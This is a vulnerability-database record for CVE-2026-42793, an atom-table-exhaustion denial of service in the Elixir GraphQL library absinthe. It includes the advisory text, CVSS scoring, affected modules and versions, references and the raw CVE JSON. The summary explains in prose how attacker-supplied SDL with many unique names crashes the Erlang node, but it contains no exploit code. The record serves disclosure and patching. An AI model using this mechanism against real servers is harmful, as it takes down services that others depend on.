Vulnerability-Lookup

CVE-2026-42793 (GCVE-0-2026-42793)

Vulnerability from cvelistv5 – Published: 2026-05-08 15:42 – Updated: 2026-05-09 12:41

Title

Atom table exhaustion via attacker-controlled GraphQL SDL names in absinthe

Summary

Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL. Multiple Blueprint.Draft.convert/2 implementations in Absinthe's SDL language modules call String.to_atom/1 on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with system_limit and taking down the entire node. Any application that passes attacker-controlled GraphQL SDL through Absinthe's parser is exposed — for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents. This issue affects absinthe: from 1.5.0 before 1.10.2.

Severity

8.2 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE

CWE-770 - Allocation of Resources Without Limits or Throttling

Assigner

EEF

References

4 references

URL	Tags
https://github.com/absinthe-graphql/absinthe/secu…	vendor-advisoryrelated
https://cna.erlef.org/cves/CVE-2026-42793.html	related
https://osv.dev/vulnerability/EEF-CVE-2026-42793	related
https://github.com/absinthe-graphql/absinthe/comm…	patch

Impacted products

2 products

Vendor	Product	Version
absinthe-graphql	absinthe	Affected: 1.5.0 , < 1.10.2 (semver) cpe:2.3:a:absinthe-graphql:absinthe::::::::
absinthe-graphql	absinthe	Affected: d0eae7764520d4e8e5dfff619068c0de911aec33 , < dd842b938e3823f345c10416914ffab5d5536838 (git) cpe:2.3:a:absinthe-graphql:absinthe::::::::

Credits

Peter Ullrich Curtis Schiewek

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-42793",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-08T16:09:01.643983Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-08T16:09:11.643Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://repo.hex.pm",
          "cpes": [
            "cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "modules": [
            "\u0027Elixir.Absinthe.Language.DirectiveDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.EnumTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.FieldDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.InputObjectTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.InputValueDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.InterfaceTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.ObjectTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.ScalarTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.UnionTypeDefinition\u0027"
          ],
          "packageName": "absinthe",
          "packageURL": "pkg:hex/absinthe",
          "product": "absinthe",
          "programFiles": [
            "lib/absinthe/language/directive_definition.ex",
            "lib/absinthe/language/enum_type_definition.ex",
            "lib/absinthe/language/field_definition.ex",
            "lib/absinthe/language/input_object_type_definition.ex",
            "lib/absinthe/language/input_value_definition.ex",
            "lib/absinthe/language/interface_type_definition.ex",
            "lib/absinthe/language/object_type_definition.ex",
            "lib/absinthe/language/scalar_type_definition.ex",
            "lib/absinthe/language/union_type_definition.ex"
          ],
          "programRoutines": [
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.DirectiveDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.EnumTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.FieldDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InputObjectTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InputValueDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InterfaceTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.ObjectTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.ScalarTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.UnionTypeDefinition\u0027:convert/2"
            }
          ],
          "repo": "https://github.com/absinthe-graphql/absinthe",
          "vendor": "absinthe-graphql",
          "versions": [
            {
              "lessThan": "1.10.2",
              "status": "affected",
              "version": "1.5.0",
              "versionType": "semver"
            }
          ]
        },
        {
          "collectionURL": "https://github.com",
          "cpes": [
            "cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "modules": [
            "\u0027Elixir.Absinthe.Language.DirectiveDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.EnumTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.FieldDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.InputObjectTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.InputValueDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.InterfaceTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.ObjectTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.ScalarTypeDefinition\u0027",
            "\u0027Elixir.Absinthe.Language.UnionTypeDefinition\u0027"
          ],
          "packageName": "absinthe-graphql/absinthe",
          "packageURL": "pkg:github/absinthe-graphql/absinthe",
          "product": "absinthe",
          "programFiles": [
            "lib/absinthe/language/directive_definition.ex",
            "lib/absinthe/language/enum_type_definition.ex",
            "lib/absinthe/language/field_definition.ex",
            "lib/absinthe/language/input_object_type_definition.ex",
            "lib/absinthe/language/input_value_definition.ex",
            "lib/absinthe/language/interface_type_definition.ex",
            "lib/absinthe/language/object_type_definition.ex",
            "lib/absinthe/language/scalar_type_definition.ex",
            "lib/absinthe/language/union_type_definition.ex"
          ],
          "programRoutines": [
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.DirectiveDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.EnumTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.FieldDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InputObjectTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InputValueDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InterfaceTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.ObjectTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.ScalarTypeDefinition\u0027:convert/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.UnionTypeDefinition\u0027:convert/2"
            }
          ],
          "repo": "https://github.com/absinthe-graphql/absinthe",
          "vendor": "absinthe-graphql",
          "versions": [
            {
              "lessThan": "dd842b938e3823f345c10416914ffab5d5536838",
              "status": "affected",
              "version": "d0eae7764520d4e8e5dfff619068c0de911aec33",
              "versionType": "git"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "1.10.2",
                  "versionStartIncluding": "1.5.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ],
          "operator": "AND"
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Peter Ullrich"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Curtis Schiewek"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL.\u003cp\u003eMultiple \u003ctt\u003eBlueprint.Draft.convert/2\u003c/tt\u003e implementations in Absinthe\u0027s SDL language modules call \u003ctt\u003eString.to_atom/1\u003c/tt\u003e on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with \u003ctt\u003esystem_limit\u003c/tt\u003e and taking down the entire node.\u003c/p\u003e\u003cp\u003eAny application that passes attacker-controlled GraphQL SDL through Absinthe\u0027s parser is exposed \u2014 for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents.\u003c/p\u003e\u003cp\u003eThis issue affects absinthe: from 1.5.0 before 1.10.2.\u003c/p\u003e"
            }
          ],
          "value": "Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL.\n\nMultiple Blueprint.Draft.convert/2 implementations in Absinthe\u0027s SDL language modules call String.to_atom/1 on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with system_limit and taking down the entire node.\n\nAny application that passes attacker-controlled GraphQL SDL through Absinthe\u0027s parser is exposed \u2014 for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents.\n\nThis issue affects absinthe: from 1.5.0 before 1.10.2."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-130",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-130 Excessive Allocation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770 Allocation of Resources Without Limits or Throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-09T12:41:41.873Z",
        "orgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
        "shortName": "EEF"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory",
            "related"
          ],
          "url": "https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-qf4g-9fqq-mmm7"
        },
        {
          "tags": [
            "related"
          ],
          "url": "https://cna.erlef.org/cves/CVE-2026-42793.html"
        },
        {
          "tags": [
            "related"
          ],
          "url": "https://osv.dev/vulnerability/EEF-CVE-2026-42793"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/absinthe-graphql/absinthe/commit/dd842b938e3823f345c10416914ffab5d5536838"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Atom table exhaustion via attacker-controlled GraphQL SDL names in absinthe",
      "x_generator": {
        "engine": "cvelib 1.8.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
    "assignerShortName": "EEF",
    "cveId": "CVE-2026-42793",
    "datePublished": "2026-05-08T15:42:46.101Z",
    "dateReserved": "2026-04-29T18:06:33.251Z",
    "dateUpdated": "2026-05-09T12:41:41.873Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42793",
      "date": "2026-05-26",
      "epss": "0.0002",
      "percentile": "0.05953"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42793\",\"sourceIdentifier\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"published\":\"2026-05-08T16:16:12.550\",\"lastModified\":\"2026-05-13T15:57:03.607\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL.\\n\\nMultiple Blueprint.Draft.convert/2 implementations in Absinthe\u0027s SDL language modules call String.to_atom/1 on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with system_limit and taking down the entire node.\\n\\nAny application that passes attacker-controlled GraphQL SDL through Absinthe\u0027s parser is exposed \u2014 for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents.\\n\\nThis issue affects absinthe: from 1.5.0 before 1.10.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"references\":[{\"url\":\"https://cna.erlef.org/cves/CVE-2026-42793.html\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"},{\"url\":\"https://github.com/absinthe-graphql/absinthe/commit/dd842b938e3823f345c10416914ffab5d5536838\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"},{\"url\":\"https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-qf4g-9fqq-mmm7\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"},{\"url\":\"https://osv.dev/vulnerability/EEF-CVE-2026-42793\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42793\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-08T16:09:01.643983Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-08T16:09:07.595Z\"}}], \"cna\": {\"title\": \"Atom table exhaustion via attacker-controlled GraphQL SDL names in absinthe\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Peter Ullrich\"}, {\"lang\": \"en\", \"type\": \"remediation developer\", \"value\": \"Curtis Schiewek\"}], \"impacts\": [{\"capecId\": \"CAPEC-130\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-130 Excessive Allocation\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*\"], \"repo\": \"https://github.com/absinthe-graphql/absinthe\", \"vendor\": \"absinthe-graphql\", \"modules\": [\"\u0027Elixir.Absinthe.Language.DirectiveDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.EnumTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.FieldDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.InputObjectTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.InputValueDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.InterfaceTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.ObjectTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.ScalarTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.UnionTypeDefinition\u0027\"], \"product\": \"absinthe\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.5.0\", \"lessThan\": \"1.10.2\", \"versionType\": \"semver\"}], \"packageURL\": \"pkg:hex/absinthe\", \"packageName\": \"absinthe\", \"programFiles\": [\"lib/absinthe/language/directive_definition.ex\", \"lib/absinthe/language/enum_type_definition.ex\", \"lib/absinthe/language/field_definition.ex\", \"lib/absinthe/language/input_object_type_definition.ex\", \"lib/absinthe/language/input_value_definition.ex\", \"lib/absinthe/language/interface_type_definition.ex\", \"lib/absinthe/language/object_type_definition.ex\", \"lib/absinthe/language/scalar_type_definition.ex\", \"lib/absinthe/language/union_type_definition.ex\"], \"collectionURL\": \"https://repo.hex.pm\", \"defaultStatus\": \"unaffected\", \"programRoutines\": [{\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.DirectiveDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.EnumTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.FieldDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InputObjectTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InputValueDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InterfaceTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.ObjectTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.ScalarTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.UnionTypeDefinition\u0027:convert/2\"}]}, {\"cpes\": [\"cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*\"], \"repo\": \"https://github.com/absinthe-graphql/absinthe\", \"vendor\": \"absinthe-graphql\", \"modules\": [\"\u0027Elixir.Absinthe.Language.DirectiveDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.EnumTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.FieldDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.InputObjectTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.InputValueDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.InterfaceTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.ObjectTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.ScalarTypeDefinition\u0027\", \"\u0027Elixir.Absinthe.Language.UnionTypeDefinition\u0027\"], \"product\": \"absinthe\", \"versions\": [{\"status\": \"affected\", \"version\": \"d0eae7764520d4e8e5dfff619068c0de911aec33\", \"lessThan\": \"dd842b938e3823f345c10416914ffab5d5536838\", \"versionType\": \"git\"}], \"packageURL\": \"pkg:github/absinthe-graphql/absinthe\", \"packageName\": \"absinthe-graphql/absinthe\", \"programFiles\": [\"lib/absinthe/language/directive_definition.ex\", \"lib/absinthe/language/enum_type_definition.ex\", \"lib/absinthe/language/field_definition.ex\", \"lib/absinthe/language/input_object_type_definition.ex\", \"lib/absinthe/language/input_value_definition.ex\", \"lib/absinthe/language/interface_type_definition.ex\", \"lib/absinthe/language/object_type_definition.ex\", \"lib/absinthe/language/scalar_type_definition.ex\", \"lib/absinthe/language/union_type_definition.ex\"], \"collectionURL\": \"https://github.com\", \"defaultStatus\": \"unaffected\", \"programRoutines\": [{\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.DirectiveDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.EnumTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.FieldDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InputObjectTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InputValueDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.InterfaceTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.ObjectTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.ScalarTypeDefinition\u0027:convert/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Blueprint.Draft.Absinthe.Language.UnionTypeDefinition\u0027:convert/2\"}]}], \"references\": [{\"url\": \"https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-qf4g-9fqq-mmm7\", \"tags\": [\"vendor-advisory\", \"related\"]}, {\"url\": \"https://cna.erlef.org/cves/CVE-2026-42793.html\", \"tags\": [\"related\"]}, {\"url\": \"https://osv.dev/vulnerability/EEF-CVE-2026-42793\", \"tags\": [\"related\"]}, {\"url\": \"https://github.com/absinthe-graphql/absinthe/commit/dd842b938e3823f345c10416914ffab5d5536838\", \"tags\": [\"patch\"]}], \"x_generator\": {\"engine\": \"cvelib 1.8.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL.\\n\\nMultiple Blueprint.Draft.convert/2 implementations in Absinthe\u0027s SDL language modules call String.to_atom/1 on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with system_limit and taking down the entire node.\\n\\nAny application that passes attacker-controlled GraphQL SDL through Absinthe\u0027s parser is exposed \\u2014 for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents.\\n\\nThis issue affects absinthe: from 1.5.0 before 1.10.2.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Allocation of Resources Without Limits or Throttling vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via atom table exhaustion when parsing attacker-controlled GraphQL SDL.\u003cp\u003eMultiple \u003ctt\u003eBlueprint.Draft.convert/2\u003c/tt\u003e implementations in Absinthe\u0027s SDL language modules call \u003ctt\u003eString.to_atom/1\u003c/tt\u003e on attacker-controlled names from parsed GraphQL SDL documents, including directive names, field names, type names, and argument names. Because atoms are never garbage-collected and the BEAM atom table has a fixed limit (default 1,048,576), each unique name permanently consumes one slot. An attacker can exhaust the atom table by submitting SDL documents containing enough unique names, causing the Erlang VM to abort with \u003ctt\u003esystem_limit\u003c/tt\u003e and taking down the entire node.\u003c/p\u003e\u003cp\u003eAny application that passes attacker-controlled GraphQL SDL through Absinthe\u0027s parser is exposed \\u2014 for example, a schema-upload endpoint, a federation gateway that ingests remote SDL, or any developer tool that runs the parser over user-supplied documents.\u003c/p\u003e\u003cp\u003eThis issue affects absinthe: from 1.5.0 before 1.10.2.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770 Allocation of Resources Without Limits or Throttling\"}]}], \"cpeApplicability\": [{\"nodes\": [{\"negate\": false, \"cpeMatch\": [{\"criteria\": \"cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*\", \"vulnerable\": true, \"versionEndExcluding\": \"1.10.2\", \"versionStartIncluding\": \"1.5.0\"}], \"operator\": \"OR\"}], \"operator\": \"AND\"}], \"providerMetadata\": {\"orgId\": \"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\", \"shortName\": \"EEF\", \"dateUpdated\": \"2026-05-09T12:41:41.873Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-42793\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-09T12:41:41.873Z\", \"dateReserved\": \"2026-04-29T18:06:33.251Z\", \"assignerOrgId\": \"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\", \"datePublished\": \"2026-05-08T15:42:46.101Z\", \"assignerShortName\": \"EEF\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-42793

Vulnerability from fkie_nvd - Published: 2026-05-08 16:16 - Updated: 2026-05-13 15:57

Severity

8.2 (High) - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://cna.erlef.org/cves/CVE-2026-42793.html
